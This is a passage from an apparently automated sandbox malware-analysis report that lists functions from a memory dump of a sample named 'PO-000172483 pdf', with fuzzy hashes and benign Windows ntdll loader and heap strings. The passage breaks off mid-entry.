Opcode Fuzzy Hash: 8fdfb190e98f8a1a8db76f2413fd6f9d7a74904c7bd792ddf941e53a317e1c97
Instruction Fuzzy Hash: DE413232A0435C8BEB26DBE8C848BADFBB8FF55340F14045AD902EBB95D7759901CB10

Function 017C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 017C4899
LdrpCheckRedirection, xrefs: 017C488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017C4888

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: d200d95d9b5bfa77f7732af9991415481cf25aa9daa009481e5b18adab372805
Instruction ID: ee7aa5465199f2c8ef5a981d837dbab6b882a558aa628058e49e9744baf64deb
Opcode Fuzzy Hash: d200d95d9b5bfa77f7732af9991415481cf25aa9daa009481e5b18adab372805
Instruction Fuzzy Hash: 2741B132A446519FCB22CE6CD860A27FBE4AF89F50F0506ADED4AD7315E730D900CB91

Function 01750BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017A543E
HEAP[%wZ]: , xrefs: 017A5431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 017A5449

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 7a85e59733820f7a9eb5e031304e2e0890dbabda8381c40cca9ff13ff43dd448
Instruction ID: 70b8e2c20a355f486e0a0e995aaa7d7c6e042096011ffc294787b073b6bff0d5
Opcode Fuzzy Hash: 7a85e59733820f7a9eb5e031304e2e0890dbabda8381c40cca9ff13ff43dd448
Instruction Fuzzy Hash: 5211EE72314502DFDBA9CA28C895B7AF3A4EF80716F198269F806CB256DB70D841CB51

Function 017C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 017C20F3
LdrpInitializationFailure, xrefs: 017C20FA
minkernel\ntdll\ldrinit.c, xrefs: 017C2104

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 325fc89d5a347b89e04e89acdfdbe60549ad8f4cf1dd7d6b1e6d82b146f9a8ec
Instruction ID: 1979a80642d702e553656d5df1bd2759681161677876d4adf2dd20c913e345f5
Opcode Fuzzy Hash: 325fc89d5a347b89e04e89acdfdbe60549ad8f4cf1dd7d6b1e6d82b146f9a8ec
Instruction Fuzzy Hash: FBF02274780308ABE720EA4CCC56F99BB68FB80F04F14006CFA0077286D6F0EA01CA81

Function 017503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017A4D8A

Strings

#%u, xrefs: 017A4D82

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: d50015ed4881c078138837f7855da81431385e1d6e83b633c912370773fc4aae
Instruction ID: 771c55a38feebd688d1b742e73114cf9a37b22838d48e29046f240b561f61797
Opcode Fuzzy Hash: d50015ed4881c078138837f7855da81431385e1d6e83b633c912370773fc4aae
Instruction Fuzzy Hash: E6716C71A0020A9FDB01DFA8C994FAEBBF8BF48744F140169E905E7255EA75ED41CBA0

Function 0174A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0174AA13
LdrResSearchResource Exit, xrefs: 0174AA25

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 09018b70f7cc4f27973e4614b6933e79a48e80a483029a0edff07b55c021a8da
Instruction ID: 3cd95e039702fa06667a40f41cca83d6a06b6342fe090d307b10d1e0c4ec8647
Opcode Fuzzy Hash: 09018b70f7cc4f27973e4614b6933e79a48e80a483029a0edff07b55c021a8da
Instruction Fuzzy Hash: 0BE18171E842199FEB22CF99C984BAEFBBAFF58310F14456AE902E7251D7349940CB50

Function 0180A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0180A44B
`, xrefs: 0180A551

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 9abfe73679d2a09485b5de9af619df8577996ec8734f4c0537b0bf8348efa2c2
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: CEC1CF3120434A9BE76ACE28CC45B6BBBE5AFC4318F144A2CF696CB2D1D775D605CB42

Function 017BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 017BE75A
UEFI, xrefs: 017BE751

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7a1526b6a34a816d88a1d9da1f2310cf17cacf7f630b5981384ad71caa6df0b9
Instruction ID: 8a5af26b5b531c9c54fd2572fba349bcb7ed55460f84e3dd9c04db8d199e67e4
Opcode Fuzzy Hash: 7a1526b6a34a816d88a1d9da1f2310cf17cacf7f630b5981384ad71caa6df0b9
Instruction Fuzzy Hash: 4D614A71E406199FDB14DFA98884BEEFBB9FB48700F14806DE659EB351DB31A940CB50

Function 017E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 017E4525
@, xrefs: 017E4437

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: cc069bd4961a95a8a9c79c4bd8351dd4acd0a270665790b7ae5618e34838de3d
Instruction ID: e88b9cdb366251bbce1a39bbe26ef6c3c859d4b9768f4b4f1ca17b349d236f1a
Opcode Fuzzy Hash: cc069bd4961a95a8a9c79c4bd8351dd4acd0a270665790b7ae5618e34838de3d
Instruction Fuzzy Hash: 74510871E4021EAFDB11DFA9CC88AEEFBF9AB48754F100529E611E7294D6309A05CB60

Function 017404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0174063D
kLsE, xrefs: 01740540

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 5dacaf0e1527023065ea0667aa3509252cce79407c533c36528a3aab9bcb3614
Instruction ID: 3ca694b9297ca6d291b1a7afc66c89f02ce36236b7d95be5afdfbf7e673c2b95
Opcode Fuzzy Hash: 5dacaf0e1527023065ea0667aa3509252cce79407c533c36528a3aab9bcb3614
Instruction Fuzzy Hash: A251AB715047429FD725EF68C444AE7FBE8AF84304F24883EFAAA87241E770D545CB92

Function 0174A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0174A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0174A309

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 9a37ed35bf047a92ff51325539e4c7e620b6f22da8bc4c3716cff3c6d2f9ac3f
Instruction ID: 2784efed3a162f0385378a31e31cd6feb2dc5dca2abe193e04219f028f98b858
Opcode Fuzzy Hash: 9a37ed35bf047a92ff51325539e4c7e620b6f22da8bc4c3716cff3c6d2f9ac3f
Instruction Fuzzy Hash: 64419D31A44649DBEB25CF69C844B6AFBB4FF85700F2441A9E902DB2A6F3B5D940CB50

Function 0177A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0177A5E9
Cleanup Group, xrefs: 0177A5E4

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 5ff77923ea2bb46edf73c3bc8de46bf1150d11ba72bed9638c8c142788a347be
Instruction ID: b1c06301068062b7c8a7f3db4d322700e8948a07f6bcdca553b71a35131d8b1d
Opcode Fuzzy Hash: 5ff77923ea2bb46edf73c3bc8de46bf1150d11ba72bed9638c8c142788a347be
Instruction Fuzzy Hash: 9201F4B2240700AFE311DF18CD49F1AB7E8EB85715F098939A648C7194E334DA04DB46

Function 0174C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0174C8C3, 0174CA40

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 39bce2bdc8c47cad4ecd84b8d4015c6e8212c728c1b47803968c9fb472237644
Instruction ID: 72340f759d53441b5a6b4f4620b023902da1b758557f926928c2897661e1ea09
Opcode Fuzzy Hash: 39bce2bdc8c47cad4ecd84b8d4015c6e8212c728c1b47803968c9fb472237644
Instruction Fuzzy Hash: 4D826A75E012188FEB25CFA9C884BEDFBB5BF48310F1481AAE959AB355D7309981CF50

Function 017C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017C65C1

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 37fd4a17dacc9a04d5d3452234037457cc3ea89acae17996ba540ca85e25c619
Instruction ID: 8968ca013836cc2534eeb318bcefeece629d7de1b5d5353bc284d8596dce5611
Opcode Fuzzy Hash: 37fd4a17dacc9a04d5d3452234037457cc3ea89acae17996ba540ca85e25c619
Instruction Fuzzy Hash: A1915271940219AFEB21DF95CD85FAEFBB8EF18B50F200059F601BB295D774A904CB60

Function 017EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 017EE1FA

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 97ea8c38acb7b9478649b953f7e5300f5f435ce1e858291a728bd15735d43a24
Instruction ID: a921fc26793feb935cd5361108a8e26fe0565f46f30c18ec522038bc75c4e5cf
Opcode Fuzzy Hash: 97ea8c38acb7b9478649b953f7e5300f5f435ce1e858291a728bd15735d43a24
Instruction Fuzzy Hash: 89919E3190064AAFDB22AFA5DC48FAFFBF9EF49740F140429F501A7250EB749941CB91

Function 0177A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 017B67C9

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: e3f1f74246f5b1c6d1d1e02adaac0ae27d6d82735887aa2273ce2d3a2b060242
Instruction ID: b501dd13385af9a92a71e6482701b71a99a012d99157f9bdbfc842c9a55bd7f5
Opcode Fuzzy Hash: e3f1f74246f5b1c6d1d1e02adaac0ae27d6d82735887aa2273ce2d3a2b060242
Instruction Fuzzy Hash: A27159B5E0021A9FDF28CF98C590BEDFBB2BF58710F14816AFA05A7245E7319941CB50

Function 017E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 017E4A7F

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 274c9f68401406f558422dd2fd6df0406c03edcfd28e47095d75c7fd16c0a8a0
Instruction ID: 3575c18c0785574a13718d5c3307a6e8e5d258472559248190e4593687785eb8
Opcode Fuzzy Hash: 274c9f68401406f558422dd2fd6df0406c03edcfd28e47095d75c7fd16c0a8a0
Instruction Fuzzy Hash: 7F5195B2D002299BDF14DF99D848AAEFBF5AF08610F054169E912FB344D7749D01CBE4

Function 0175E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0175E6A4

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 1ebff89a289351ad93b4abd8bbc50cd6c2bd393b4492d46ce1abba502db1eabd
Instruction ID: e2ac9aa8aed3ed5f2f28409d2c74857fa79b4f7862b957444e71b6c70a448817
Opcode Fuzzy Hash: 1ebff89a289351ad93b4abd8bbc50cd6c2bd393b4492d46ce1abba502db1eabd
Instruction Fuzzy Hash: 574182725083029BD751DA75C844B6BF7E8AF88714F440D6DFE84D7184EAB4DA04C796

Function 017BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 017BC77F

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 5acf0c5a200528c6f0bd4b890ced20e258d251d2117a175045f1836a4defba41
Instruction ID: 27701db9117e9bf1ff234ce66d7a0a8dd7201c8398d6bab86535e968d84ed934
Opcode Fuzzy Hash: 5acf0c5a200528c6f0bd4b890ced20e258d251d2117a175045f1836a4defba41
Instruction Fuzzy Hash: DA4142B1D4012DABDB22DA50CC85FDEF77CAB54714F0085A5EB08AB144DB709E89CFA4

Function 017D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 017D6B91

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 769c8d9bce0012f68693d6bc58319e76c86f4e9e45b62403cff07c6427b18ec2
Instruction ID: 49fd34510f43578e44b53d04f85cbc4c390b482344e76072e0dc618da24a3913
Opcode Fuzzy Hash: 769c8d9bce0012f68693d6bc58319e76c86f4e9e45b62403cff07c6427b18ec2
Instruction Fuzzy Hash: CB31F231A0075D9AEB22DB69C854BAEFBB8DF04704F144068F949AB282DBB5F905CB50

Function 017BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 017BCAA2

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: b93cc49aad292d238116fa43595674985ea803baeb66c3364d494e4fca635b47
Instruction ID: f3bd1fa21a7d9b8482dc03a567c04ed3448836a278e8fef6dab3ddc1a1715786
Opcode Fuzzy Hash: b93cc49aad292d238116fa43595674985ea803baeb66c3364d494e4fca635b47
Instruction Fuzzy Hash: 59312736900515AFEB17DB58C895FAFFB74EF80710F018169E901AB250D7309E00EBE0

Function 017C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017C895E

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: dbdcdf290e2efd04c98675f8878891176e6e0dad38496a98e977f77ae3ec8d09
Instruction ID: d1f93f65b7e01e95be10e92afb88c29f1311a160fed8ca1ca05ba746e27efb0d
Opcode Fuzzy Hash: dbdcdf290e2efd04c98675f8878891176e6e0dad38496a98e977f77ae3ec8d09
Instruction Fuzzy Hash: F90126723002019BE720AB59CCC8AEAFB65EFC1B54B08042CF6821A165CB20A841CBA7

Function 017E2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0765849797970fa2f833d55eb0c125de074ab5ffc8d20352aaa913061cdd6f6
Instruction ID: eb6a38cca5fbb684b7391ff390925bc40f8b35598bc129f33222574933e0e710
Opcode Fuzzy Hash: c0765849797970fa2f833d55eb0c125de074ab5ffc8d20352aaa913061cdd6f6
Instruction Fuzzy Hash: 4B42D4716483419FE725CF68C898A6BFBE9BF8C340F18092DFA8297252D770D945CB52

Function 017D8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67606d38095a1fb0abacf294531fff2fee0f609acd9e5420e452261cc96533ed
Instruction ID: 83abfdb58dda1581e8af7058676bd65fb60f242ef61d21a4f0820ab99d2cc67e
Opcode Fuzzy Hash: 67606d38095a1fb0abacf294531fff2fee0f609acd9e5420e452261cc96533ed
Instruction Fuzzy Hash: E1426E75E102198FEB24CF69C841BADFBF5BF48310F198199E949EB242DB34A981CF51

Function 01752840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2040462da8531653580f31aeaa1b06a9a77ad0634636e2fc2472dd5375d90e8
Instruction ID: a909c88d371f6f779fb6cc051be0f1f61a7336f436341e18c2a5a01a09b6a223
Opcode Fuzzy Hash: d2040462da8531653580f31aeaa1b06a9a77ad0634636e2fc2472dd5375d90e8
Instruction Fuzzy Hash: F732EC70A00755CBEB25CF69C8487BEFBF6BF84300F68421DE9869B285D775A942CB50

Function 017EA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ac9b44ee09fb8c67178a0ca7a05eaa197f8c316130d79ffc734c87112c66342
Instruction ID: 8878f467a49de5439bde42ca0b48cb36e0308cf9464f22a5f8202a21485c2fe3
Opcode Fuzzy Hash: 2ac9b44ee09fb8c67178a0ca7a05eaa197f8c316130d79ffc734c87112c66342
Instruction Fuzzy Hash: CE22E1742046618FEB25CF2DC098772FBF1AF4D340F18849AE9968F286E375E552CB61

Function 01746A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c91af610760e4db29cd4295c4f03a0cad74291f6d365c3cc15f970dd913333
Instruction ID: a33006fd9aaf2a1b036d9c19757aecfc6fcc8b25ecc37c8aa175f83337d0ffc0
Opcode Fuzzy Hash: 20c91af610760e4db29cd4295c4f03a0cad74291f6d365c3cc15f970dd913333
Instruction Fuzzy Hash: 2A32AF71A05615CFDB25CF68C480BAAFBF1FF89300F6486A9E955AB391D734E841CB50

Function 01764A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: a818cb3ffb8ab927d826c1a2cae7cee9cf7950e379651a38d12987be87cea440
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 9CF17F70E0021A9BDB15CFA9C584BAEFBF9BF48710F448129ED06AB345E774D841CB60

Function 017D892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8cb87cbbfb2a0272e5e975bdf2e6d1f86572b6ce9cea35be630c62348cc162c
Instruction ID: e37ee97f188be231bd44354f878b012944e9cea8ef3668e64b79014fb5c4e1ab
Opcode Fuzzy Hash: e8cb87cbbfb2a0272e5e975bdf2e6d1f86572b6ce9cea35be630c62348cc162c
Instruction Fuzzy Hash: 91D1F271A0060E8BDF05CF69C841BFEFBF5AF88304F1981AAD955A7281D735EA05CB61

Function 017465D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3456815a0a7a4dc33f79bd617a093f970ac6abeb2a878177e4ca05bd1d78511a
Instruction ID: efae6b3516ba5a3e9029f73a341c1838b2e28ac0b5e58a3346da27bc4ee30c88
Opcode Fuzzy Hash: 3456815a0a7a4dc33f79bd617a093f970ac6abeb2a878177e4ca05bd1d78511a
Instruction Fuzzy Hash: 28E17A75608342CFC715CF28C090A6AFBE0BF8A314F158A6DF99987351EB71E905CB92

Function 01738397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4606527a8780f43c204f478988a32d67758bae2211d6402d82a49c9b118a2b2d
Instruction ID: 28a2d3f5c2d67034f29cb940dd78456f755e1561857f27f68d9ba55c6ac047f5
Opcode Fuzzy Hash: 4606527a8780f43c204f478988a32d67758bae2211d6402d82a49c9b118a2b2d
Instruction Fuzzy Hash: 73D1F271A002069BDF15CF68D880EBAF7A5BF94304F14436DF912DB282EB34E954CB92

Function 017C8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 35dad09c109794c88257ddbc9ffa55f760a6341461fe52af2927beff906880b2
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 70B18F75A00609AFDF24DF98C944FABFBBAFF84704F10446EAA4297794DA34E905CB11

Function 01750535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 8963d303b998cec51a50e3103a414b99ad9b391b987307b461084e0c4b56f6a7
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 92B129316046469FDB25DB68C854BBEFBF6AF84300F280699EA5297385DBB0DD41CB90

Function 017483C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0806446212d394fea47f8a125b51cc5999b759b0456f808aa482ab76cc930db5
Instruction ID: c6045db1115d09ec7b31132a26ed46bda220889d64f25c38e830101cd03694b0
Opcode Fuzzy Hash: 0806446212d394fea47f8a125b51cc5999b759b0456f808aa482ab76cc930db5
Instruction Fuzzy Hash: D1C178746083858FE760CF58C494BABF7E5BF88304F94496DE98987291E774E908CF92

Function 0173C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

